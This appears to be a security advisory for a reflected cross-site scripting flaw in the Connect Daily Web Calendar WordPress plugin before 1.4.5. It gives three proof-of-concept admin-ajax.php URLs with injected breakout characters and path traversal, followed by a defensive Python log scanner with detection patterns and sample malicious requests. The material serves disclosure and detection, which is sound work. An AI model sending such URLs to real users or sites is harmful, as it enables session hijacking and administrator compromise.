The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue that could be used against both unauthenticated and authenticated users (including high-privilege ones such as admins).
1. Create a new calendar in the plugin’s settings page (most payloads below require at least one calendar to exist).

Attack: Make any unauthenticated or authenticated user (such as an admin) open one of the URLs below:

1. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=-->
2. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX">
3. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=
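
To check whether a site has received requests shaped like the ones above, the following added example (not code from the plugin or from the advisory's author) scans web server access-log lines for `admin-ajax.php` requests with `action=cdaily` whose reflected parameters decode to markup or traversal characters. The combined log format, the chosen character set and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters that carry reflected input in the advisory's proof-of-concept URLs.
REFLECTED_PARAMS = {"callback", "by_id", "id", "bymethod"}
# Characters that let a value break out of an HTML or script context, plus the
# directory traversal sequence seen in the by_id example (assumed heuristic).
SUSPICIOUS = re.compile(r"""[<>"'`]|\.\./""")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; addresses come from documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX%22%3E HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../r%26_=--%3E HTTP/1.1" 200 498',
    '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=cb%3Cb%3E HTTP/1.1" 200 120',
    '198.51.100.4 - - [01/Jan/2024:10:02:00 +0000] "GET /wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=3 HTTP/1.1" 200 2048',
    '198.51.100.4 - - [01/Jan/2024:10:03:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat&id=%3Cx%3E HTTP/1.1" 200 64',
]


def suspicious_params(url):
    """Return sorted names of cdaily parameters whose decoded value looks like markup."""
    parts = urlsplit(url)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return []
    params = parse_qsl(parts.query, keep_blank_values=True)  # decodes %XX once
    if ("action", "cdaily") not in params:
        return []
    return sorted({k for k, v in params if k in REFLECTED_PARAMS and SUSPICIOUS.search(v)})


def scan_log(lines):
    """Return (client_ip, flagged_params) for every log line that matches."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if m:
            flagged = suspicious_params(m.group(1))
            if flagged:
                hits.append((line.split(" ", 1)[0], flagged))
    return hits


if __name__ == "__main__":
    for ip, flagged in scan_log(SAMPLE_LOG):
        print(ip, ",".join(flagged))
```

Percent-encoding is decoded only once, so double-encoded values are not flagged, and a hit shows that a request was received, not that a user's browser rendered the response.
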
CPE

Name | Operator | Version |
---|---|---|
connect-daily-web-calendar | lt | 1.4.5 |